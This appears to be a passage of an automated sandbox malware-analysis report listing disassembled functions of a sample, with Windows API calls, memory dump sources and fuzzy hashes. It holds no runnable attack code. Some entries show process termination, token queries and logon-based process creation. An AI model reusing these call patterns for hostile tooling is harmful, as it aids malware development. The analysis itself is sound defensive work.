                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$FileName$OpenSave
                                                                    • String ID: X
                                                                    • API String ID: 83654149-3081909835
                                                                    • Opcode ID: e49b2e3c79609ae100fd6913abbbde6385c40eef0eed0db4373f2fbdf6c2678f
                                                                    • Instruction ID: d0da13c3cef5ed4a145fd7bb3d36c8534339a0a56cf8258cc69c17d3f6bc3def
                                                                    • Opcode Fuzzy Hash: e49b2e3c79609ae100fd6913abbbde6385c40eef0eed0db4373f2fbdf6c2678f
                                                                    • Instruction Fuzzy Hash: E9E1B431508340DFD724DF2AC881A6AB7E4FF85314F14896DF9999B2A2EB31DD05CB92
                                                                    Function 008F920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                    • BeginPaint.USER32(?,?,?), ref: 008F9241
                                                                    • GetWindowRect.USER32(?,?), ref: 008F92A5
                                                                    • ScreenToClient.USER32(?,?), ref: 008F92C2
                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008F92D3
                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 008F9321
                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009371EA
                                                                      • Part of subcall function 008F9339: BeginPath.GDI32(00000000), ref: 008F9357
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                    • String ID:
                                                                    • API String ID: 3050599898-0
                                                                    • Opcode ID: aae24785eb7ec7d236c79107292aa075392c7cd75f6a188475ccc6ad2ea448b8
                                                                    • Instruction ID: e0541d7262a516236dae80a99eeddea3a21cd3b256dc53b04c8cb829e7b05b4e
                                                                    • Opcode Fuzzy Hash: aae24785eb7ec7d236c79107292aa075392c7cd75f6a188475ccc6ad2ea448b8
                                                                    • Instruction Fuzzy Hash: 1941B071118305AFD721DF64DCD4FBA7BA8FB55324F140229FAA8C72A1C7319885EB62
                                                                    Function 009507EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0095080C
                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00950847
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00950863
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 009508DC
                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 009508F3
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00950921
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3368777196-0
                                                                    • Opcode ID: 546e272b3b007a450fcc76e5ea8ef87144378350ed80153542909df34de0cff4
                                                                    • Instruction ID: b28a9064e09458fa08cdd7fc83f6d573c741a82804dd8ffa3743faa6134aaa4c
                                                                    • Opcode Fuzzy Hash: 546e272b3b007a450fcc76e5ea8ef87144378350ed80153542909df34de0cff4
                                                                    • Instruction Fuzzy Hash: 01414871900209EBDF14EF65DC85A6A77B8FF44310F1440A9EE04AE29BDB31DE65DBA0
                                                                    Function 009781DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0093F3AB,00000000,?,?,00000000,?,0093682C,00000004,00000000,00000000), ref: 0097824C
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00978272
                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 009782D1
                                                                    • ShowWindow.USER32(00000000,00000004), ref: 009782E5
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0097830B
                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0097832F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 642888154-0
                                                                    • Opcode ID: e3607093832fe2dc7539007505427b2fd72e4e58ab710845fc654c102434a560
                                                                    • Instruction ID: 7daa732f0f0306f6e8048fc7f18a2287592316d0a2f2f82f67b03b8ba4a68454
                                                                    • Opcode Fuzzy Hash: e3607093832fe2dc7539007505427b2fd72e4e58ab710845fc654c102434a560
                                                                    • Instruction Fuzzy Hash: 0741F332645640EFDB25CF14D99DBE57BE4FB4A755F1882A8E61C4B2A3CB31A841CB40
                                                                    Function 00944C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 00944C95
                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00944CB2
                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00944CEA
                                                                    • _wcslen.LIBCMT ref: 00944D08
                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00944D10
                                                                    • _wcsstr.LIBVCRUNTIME ref: 00944D1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                    • String ID:
                                                                    • API String ID: 72514467-0
                                                                    • Opcode ID: a3b038546b08338c0e726e03d7b96ce0f93d996eec0c101fe7c2f0358eff7fb1
                                                                    • Instruction ID: 8e6743aa966f1dbb0846aace8106a7fbc22d5946fc88eed80f997b54b254e7ce
                                                                    • Opcode Fuzzy Hash: a3b038546b08338c0e726e03d7b96ce0f93d996eec0c101fe7c2f0358eff7fb1
                                                                    • Instruction Fuzzy Hash: F5213872604205BBEB255B39EC89F7B7B9CDF45750F10803DF909CE1D2EA61DC4096A0
                                                                    Function 0095581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E3A97,?,?,008E2E7F,?,?,?,00000000), ref: 008E3AC2
                                                                    • _wcslen.LIBCMT ref: 0095587B
                                                                    • CoInitialize.OLE32(00000000), ref: 00955995
                                                                    • CoCreateInstance.OLE32(0097FCF8,00000000,00000001,0097FB68,?), ref: 009559AE
                                                                    • CoUninitialize.OLE32 ref: 009559CC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                    • String ID: .lnk
                                                                    • API String ID: 3172280962-24824748
                                                                    • Opcode ID: 00ef9676209461dfb9e3fb46d70bc5e26a29e061bc12d15d0738681c6b9c7d6f
                                                                    • Instruction ID: a0396ab07ebaacba3068231b0b3205e318ed0e942386bfba970e812140da2b14
                                                                    • Opcode Fuzzy Hash: 00ef9676209461dfb9e3fb46d70bc5e26a29e061bc12d15d0738681c6b9c7d6f
                                                                    • Instruction Fuzzy Hash: C8D186716047019FC714DF1AC4A4A2ABBE5FF8A711F15885DF8899B362CB31EC49CB92
                                                                    Function 0094175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00940FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00940FCA
                                                                      • Part of subcall function 00940FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00940FD6
                                                                      • Part of subcall function 00940FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00940FE5
                                                                      • Part of subcall function 00940FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00940FEC
                                                                      • Part of subcall function 00940FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00941002
                                                                    • GetLengthSid.ADVAPI32(?,00000000,00941335), ref: 009417AE
                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009417BA
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 009417C1
                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 009417DA
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00941335), ref: 009417EE
                                                                    • HeapFree.KERNEL32(00000000), ref: 009417F5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                    • String ID:
                                                                    • API String ID: 3008561057-0
                                                                    • Opcode ID: 70a27b87d4661ab1c606ffa9a818e8c49379457ae67e016f65ac30f3962a5405
                                                                    • Instruction ID: 9851e8442c766ecd1d31806979590e3ba9f7cd9119304149b5d9d581346aa610
                                                                    • Opcode Fuzzy Hash: 70a27b87d4661ab1c606ffa9a818e8c49379457ae67e016f65ac30f3962a5405
                                                                    • Instruction Fuzzy Hash: DC118B72628205FFDB109FA4CC89FAE7BBDEB86355F104528F485A7210D736A984DB60
                                                                    Function 009414CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009414FF
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00941506
                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00941515
                                                                    • CloseHandle.KERNEL32(00000004), ref: 00941520
                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0094154F
                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00941563
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                    • String ID:
                                                                    • API String ID: 1413079979-0
                                                                    • Opcode ID: 411b679cb41a5bfaa7d4c1c71cd2d4bcfe09f7133548f2a05940ae52efd161ca
                                                                    • Instruction ID: dd40a7792ad5668ac93cad282340f008948a32ce0f8f4a4ed221010d4a3ae9b4
                                                                    • Opcode Fuzzy Hash: 411b679cb41a5bfaa7d4c1c71cd2d4bcfe09f7133548f2a05940ae52efd161ca
                                                                    • Instruction Fuzzy Hash: 0411F9B2605209EBDF118F98DD49FDE7BADEF48744F044019FA09A2160C3758EA5EB60
                                                                    Function 00903382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00903379,00902FE5), ref: 00903390
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0090339E
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009033B7
                                                                    • SetLastError.KERNEL32(00000000,?,00903379,00902FE5), ref: 00903409
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 0f7087a8066be854d9d5056048bc47ab1516c5f4ab4b5b58e5cd438ba8413922
                                                                    • Instruction ID: 2ef48b7c9f5e9a6fb7882d42adfeae4fb4387374fa7a868910d479f12a87ad13
                                                                    • Opcode Fuzzy Hash: 0f7087a8066be854d9d5056048bc47ab1516c5f4ab4b5b58e5cd438ba8413922
                                                                    • Instruction Fuzzy Hash: 6B01477322C721BEEA2527747CC67672A9CEF46379320822DF610881F0FF224D416284
                                                                    Function 00912D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00915686,00923CD6,?,00000000,?,00915B6A,?,?,?,?,?,0090E6D1,?,009A8A48), ref: 00912D78
                                                                    • _free.LIBCMT ref: 00912DAB
                                                                    • _free.LIBCMT ref: 00912DD3
                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,0090E6D1,?,009A8A48,00000010,008E4F4A,?,?,00000000,00923CD6), ref: 00912DE0
                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,0090E6D1,?,009A8A48,00000010,008E4F4A,?,?,00000000,00923CD6), ref: 00912DEC
                                                                    • _abort.LIBCMT ref: 00912DF2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free$_abort
                                                                    • String ID:
                                                                    • API String ID: 3160817290-0
                                                                    • Opcode ID: b3cd65ec096a7d8f4bbee51761c2f9c304eecb8433394a12e59444a3260238cc
                                                                    • Instruction ID: 1c13220729a4bf92c68932e670ed74ed8364616959261d98f1fdb889071e7856
                                                                    • Opcode Fuzzy Hash: b3cd65ec096a7d8f4bbee51761c2f9c304eecb8433394a12e59444a3260238cc
                                                                    • Instruction Fuzzy Hash: 01F0A97A7486082BC6123738FD06BDA165D6FC2771F25441CF838961D1EE2488E15160
                                                                    Function 00978A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008F9693
                                                                      • Part of subcall function 008F9639: SelectObject.GDI32(?,00000000), ref: 008F96A2
                                                                      • Part of subcall function 008F9639: BeginPath.GDI32(?), ref: 008F96B9
                                                                      • Part of subcall function 008F9639: SelectObject.GDI32(?,00000000), ref: 008F96E2
                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00978A4E
                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 00978A62
                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00978A70
                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 00978A80
                                                                    • EndPath.GDI32(?), ref: 00978A90
                                                                    • StrokePath.GDI32(?), ref: 00978AA0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                    • String ID:
                                                                    • API String ID: 43455801-0
                                                                    • Opcode ID: 4f27c0b918daa37feddc63466d5d63fa7976487f7dc190cec1b262771035ecc3
                                                                    • Instruction ID: 16843eb8d3643d2684bba8bf6634e6419f104b7f2462df5efad003d2a79f0b14
                                                                    • Opcode Fuzzy Hash: 4f27c0b918daa37feddc63466d5d63fa7976487f7dc190cec1b262771035ecc3
                                                                    • Instruction Fuzzy Hash: 43111B7604414CFFDF129F94DC88EAA7F6DEB08390F008026FA199A1A1C7719D95EFA0
                                                                    Function 009451FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00945218
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00945229
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00945230
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00945238
                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0094524F
                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00945261
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDevice$Release
                                                                    • String ID:
                                                                    • API String ID: 1035833867-0
                                                                    • Opcode ID: 14aa3ca0866c3aac3da9d899e99296aa7eb4ca9f0a4bd5d814a2e8b3caef109d
                                                                    • Instruction ID: a8e79e19d48490d9fcae84ed130d81d70d2cd9e6ae566b22ea5eb197d702a634
                                                                    • Opcode Fuzzy Hash: 14aa3ca0866c3aac3da9d899e99296aa7eb4ca9f0a4bd5d814a2e8b3caef109d
                                                                    • Instruction Fuzzy Hash: 9E0144B6E04719BBEB105BE59C49E5EBFB8EF48751F044065FA08A7281D6709800DFA0
                                                                    Function 008E1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008E1BF4
                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 008E1BFC
                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008E1C07
                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008E1C12
                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 008E1C1A
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 008E1C22
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID:
                                                                    • API String ID: 4278518827-0
                                                                    • Opcode ID: e8b940bcdc13fdf56a6b328017858da882fd85c1d9c17652851b7af522179563
                                                                    • Instruction ID: 14f2f921736c4a5dcc69291dddca9fc84313270fb0c443a6b8bf2e4cf81510d2
                                                                    • Opcode Fuzzy Hash: e8b940bcdc13fdf56a6b328017858da882fd85c1d9c17652851b7af522179563
                                                                    • Instruction Fuzzy Hash: 24016CB090275A7DE3008F5A8C85B52FFA8FF19754F00411F915C47941C7F5A864CBE5
                                                                    Function 0094EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0094EB30
                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0094EB46
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0094EB55
                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0094EB64
                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0094EB6E
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0094EB75
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 839392675-0
                                                                    • Opcode ID: 2ee770dd94fa08db9cf671ee5f8479c3bfe65c6c8ed3e10cacd3bf77a4d5b305
                                                                    • Instruction ID: 5dd85af2c9bc9b242ab2905d3ff9359b59bedfc291e850b54808c25207b2e9a8
                                                                    • Opcode Fuzzy Hash: 2ee770dd94fa08db9cf671ee5f8479c3bfe65c6c8ed3e10cacd3bf77a4d5b305
